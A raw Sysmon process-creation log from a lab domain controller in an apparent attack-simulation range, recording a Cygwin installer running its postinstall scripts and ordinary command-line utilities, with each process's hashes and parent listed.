14:55:58.773{A8622C2F-53FE-6078-F00A-00000000AE01}6416C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FE-6078-EF0A-00000000AE01}1496C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000053809Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.737{A8622C2F-53FE-6078-EF0A-00000000AE01}1496C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FE-6078-EE0A-00000000AE01}6808C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000053797Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.725{A8622C2F-53FE-6078-EE0A-00000000AE01}6808C:\cygwin64\bin\install-info.exe-----"C:\cygwin64\bin\install-info.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B0D5F39A3DD38E4D97AB5EC7928039E,SHA256=19F79F3A560DABAF66F9C8A12988DCBD75944243CD5484A098258B785BF88EC4,IMPHASH=627D6C94A7DBAF592C9D5DCD07DA5985{A8622C2F-53FE-6078-ED0A-00000000AE01}5776C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053787Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.718{A8622C2F-53FE-6078-ED0A-00000000AE01}5776C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053776Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.710{A8622C2F-53FE-6078-EC0A-00000000AE01}6268C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-53FE-6078-EB0A-00000000AE01}3368C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053766Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.703{A8622C2F-53FE-6078-EB0A-00000000AE01}3368C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053755Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.694{A8622C2F-53FE-6078-EA0A-00000000AE01}7016C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FE-6078-E90A-00000000AE01}5996C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053745Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.687{A8622C2F-53FE-6078-E90A-00000000AE01}5996C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053732Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.679{A8622C2F-53FE-6078-E80A-00000000AE01}6592C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FE-6078-E70A-00000000AE01}5224C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053722Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.672{A8622C2F-53FE-6078-E70A-00000000AE01}5224C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053707Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.661{A8622C2F-53FE-6078-E60A-00000000AE01}3912C:\cygwin64\bin\md5sum.exe-----"C:\cygwin64\bin\md5sum.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3B8C3C5077E7ED81923431A44ED63064,SHA256=A91C2519D95CE4E05F09BEB0E3BE7424CB0D041440A211E556CD7464AB628EE4,IMPHASH=42A9CEBE5FBB227E3450E617A2B4652F{A8622C2F-53FE-6078-E40A-00000000AE01}4788C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053696Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.654{A8622C2F-53FE-6078-E50A-00000000AE01}6032C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-53FE-6078-E30A-00000000AE01}5404C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053689Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.653{A8622C2F-53FE-6078-E40A-00000000AE01}4788C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053678Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.646{A8622C2F-53FE-6078-E30A-00000000AE01}5404C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000053660Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.614{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000053648Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.594{A8622C2F-53FE-6078-E00A-00000000AE01}1348C:\cygwin64\bin\mv.exe-----"C:\cygwin64\bin\mv.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9C3FAC81E10B930A3218459438012345,SHA256=65D525AA50EFE6EE796887C76E8F0E6B99D216018506BB59BF32562C3D32C071,IMPHASH=9C18D209F9C5FB9FE70B2F2187E63FC4{A8622C2F-53FE-6078-DF0A-00000000AE01}6076C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash" 154100x800000000000000053638Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.587{A8622C2F-53FE-6078-DF0A-00000000AE01}6076C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C107-00000000AE01}928C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash" 154100x800000000000000053626Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.548{A8622C2F-53FE-6078-DE0A-00000000AE01}6552C:\cygwin64\bin\rebase.exe-----"C:\cygwin64\bin\rebase.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4A308037D2E4D064FCFA424E5C1BC040,SHA256=46411F6279D4E7FB525AFA36C607531209F90406399F9B5D410864F48FFF7AA1,IMPHASH=37A0EDB849270EF8EB9803223F088459{A8622C2F-53FE-6078-DD0A-00000000AE01}3304C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053616Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.541{A8622C2F-53FE-6078-DD0A-00000000AE01}3304C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053606Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.531{A8622C2F-53FE-6078-DC0A-00000000AE01}5744C:\cygwin64\bin\sort.exe-----"C:\cygwin64\bin\sort.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C16D6C2C86D1FD3F76F369B857FC51D2,SHA256=9CF25F5A9D0DD784BEE8278A61C2429CBF04C32D3407B78A9F3B1D0500F7ACCA,IMPHASH=BAA25F5285129EA97CBED20CD70B6EC7{A8622C2F-53FE-6078-DA0A-00000000AE01}1496C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053587Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.523{A8622C2F-53FE-6078-DB0A-00000000AE01}5640C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FE-6078-D80A-00000000AE01}5776C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053586Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.523{A8622C2F-53FE-6078-DA0A-00000000AE01}1496C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053567Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.515{A8622C2F-53FE-6078-D90A-00000000AE01}6268C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FE-6078-D70A-00000000AE01}4568C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053566Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.515{A8622C2F-53FE-6078-D80A-00000000AE01}5776C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053554Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.508{A8622C2F-53FE-6078-D70A-00000000AE01}4568C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053542Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.498{A8622C2F-53FE-6078-D60A-00000000AE01}4384C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-53FE-6078-D50A-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053532Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.491{A8622C2F-53FE-6078-D50A-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053522Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.482{A8622C2F-53FE-6078-D40A-00000000AE01}924C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FE-6078-D30A-00000000AE01}1612C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053512Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.475{A8622C2F-53FE-6078-D30A-00000000AE01}1612C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053502Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.467{A8622C2F-53FE-6078-D20A-00000000AE01}6196C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FE-6078-D10A-00000000AE01}6748C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053492Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.460{A8622C2F-53FE-6078-D10A-00000000AE01}6748C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053480Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.451{A8622C2F-53FE-6078-D00A-00000000AE01}6084C:\cygwin64\bin\tr.exe-----"C:\cygwin64\bin\tr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=65789252526C9B5F8A73D99D53C2CC58,SHA256=464DA547E4E2B9B5E5E3C7B4773820257AAA39BCF85318B5CE86443E6EA5F3C7,IMPHASH=CDDCB078A4D97440CAEF0552021BCA5C{A8622C2F-53FE-6078-CE0A-00000000AE01}1156C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053461Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.444{A8622C2F-53FE-6078-CF0A-00000000AE01}5220C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FE-6078-CD0A-00000000AE01}3208C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053460Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.443{A8622C2F-53FE-6078-CE0A-00000000AE01}1156C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-CC0A-00000000AE01}6456C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053450Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.436{A8622C2F-53FE-6078-CD0A-00000000AE01}3208C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-CC0A-00000000AE01}6456C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053438Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.429{A8622C2F-53FE-6078-CC0A-00000000AE01}6456C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.421{A8622C2F-53FE-6078-CB0A-00000000AE01}6440C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FE-6078-CA0A-00000000AE01}6552C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053416Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.413{A8622C2F-53FE-6078-CA0A-00000000AE01}6552C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053404Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.404{A8622C2F-53FE-6078-C90A-00000000AE01}5312C:\cygwin64\bin\mv.exe-----"C:\cygwin64\bin\mv.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9C3FAC81E10B930A3218459438012345,SHA256=65D525AA50EFE6EE796887C76E8F0E6B99D216018506BB59BF32562C3D32C071,IMPHASH=9C18D209F9C5FB9FE70B2F2187E63FC4{A8622C2F-53FE-6078-C80A-00000000AE01}5744C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053394Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.397{A8622C2F-53FE-6078-C80A-00000000AE01}5744C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053384Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.381{A8622C2F-53FE-6078-C70A-00000000AE01}2408C:\cygwin64\bin\find.exe-----"C:\cygwin64\bin\find.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C17DC689E2E9C2AF759E7A3046DE8F1D,SHA256=77371827DA82B14D29999F738B77F53053833BE5C0257DC85E8A091ABB662789,IMPHASH=58AC74B0A7539EFE91A9196817FF689C{A8622C2F-53FE-6078-C60A-00000000AE01}6652C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053374Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 